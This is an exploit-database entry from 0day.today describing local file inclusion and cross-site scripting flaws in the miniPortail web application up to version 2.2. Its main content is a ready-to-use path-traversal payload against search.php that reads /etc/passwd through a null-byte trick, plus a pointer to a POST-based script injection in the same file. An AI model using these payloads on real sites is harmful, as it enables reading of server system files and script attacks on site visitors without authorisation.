[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities

Author
StAkeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3942
Category
web applications
Date add
22-10-2008
Platform
unsorted
===================================================
miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
===================================================


/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR 
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/



#  0day.today [2024-12-24]  #